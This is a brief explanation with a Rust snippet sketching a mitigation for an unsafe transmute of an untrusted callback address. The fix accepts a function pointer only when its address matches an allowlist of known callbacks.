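The intended-interactions attack works because analyze_data transmutes whatever address get_cb_from_c returns. As a rough sketch of what sanitizing that value could look like, the code below only accepts addresses that match a known set of callbacks. `checked_callback` is a hypothetical helper that is not part of this repository, and the `incrementer` and `doubler` bodies here are simplified copies for illustration. It assumes the expected callbacks are known to the Rust side in advance, which may not hold for every design.

```rust
/// Simplified copies of the benign callbacks, for illustration only.
pub fn incrementer(x: &mut i64) {
    *x += 1;
}

pub fn doubler(x: &mut i64) {
    *x += 2;
}

/// Hypothetical helper: returns a callback only if `addr` equals the address
/// of one of the expected functions, so no transmute of untrusted data occurs.
pub fn checked_callback(addr: i64) -> Option<fn(&mut i64)> {
    let allowed: [fn(&mut i64); 2] = [incrementer, doubler];
    allowed
        .iter()
        .copied()
        // Compare addresses as integers; unknown addresses are rejected.
        .find(|f| *f as usize as i64 == addr)
}
```

A caller would match on the returned `Option` and treat `None` as corrupted input, instead of calling through an address it cannot account for.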


--------------------------------------------------------------------------------